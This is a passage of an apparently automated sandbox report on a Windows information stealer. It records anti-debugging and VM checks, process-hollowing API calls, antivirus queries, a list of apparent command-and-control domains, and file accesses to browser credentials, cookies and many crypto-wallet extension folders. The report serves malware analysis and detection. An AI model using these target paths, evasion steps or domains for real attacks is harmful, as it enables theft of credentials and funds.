                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280589839.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3"
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: 1fxm3u0d.exe, 00000003.00000003.2380981803.000000000335C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000335D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0019A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A62A
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001BE1B4 mov edi, dword ptr fs:[00000030h]0_2_001BE1B4
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00173D40 mov edi, dword ptr fs:[00000030h]0_2_00173D40
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A12F0 GetProcessHeap,0_2_001A12F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0019A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A62A
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00190ED8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00190ED8
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00190F5B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00190F5B
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00190F4F SetUnhandledExceptionFilter,0_2_00190F4F

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001BE1B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_001BE1B4
                Source: C:\Users\user\Desktop\1fxm3u0d.exeMemory written: C:\Users\user\Desktop\1fxm3u0d.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: servicedny.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: authorisev.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: faulteyotk.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dilemmadu.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: contemteny.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: goalyfeastz.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: opposezmny.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seallysl.site
                Source: 1fxm3u0d.exe, 00000000.00000002.2415350957.0000000004575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: thighpecr.cyou
                Source: C:\Users\user\Desktop\1fxm3u0d.exeProcess created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001910D6 cpuid 0_2_001910D6
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: EnumSystemLocalesW,0_2_001A5133
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,0_2_001A51A0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: EnumSystemLocalesW,0_2_001A5275
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,0_2_001A52C0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001A5367
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: EnumSystemLocalesW,0_2_001A0BCD
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001A4BE7
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,0_2_001A546D
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: EnumSystemLocalesW,0_2_001A4E38
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,0_2_001A06C5
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_001A4EE0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00191EE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00191EE5
                Source: C:\Users\user\Desktop\1fxm3u0d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: 1fxm3u0d.exe, 1fxm3u0d.exe, 00000003.00000003.2308365145.0000000005AE8000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320862491.0000000003422000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2307105487.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2369932201.0000000003433000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320950832.000000000342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\1fxm3u0d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 1fxm3u0d.exe PID: 6596, type: MEMORYSTR
                Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                Source: 1fxm3u0d.exeString found in binary or memory: Wallets/ElectronCash
                Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: 1fxm3u0d.exe, 00000003.00000003.2283777558.0000000003425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 1fxm3u0d.exe, 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\1fxm3u0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
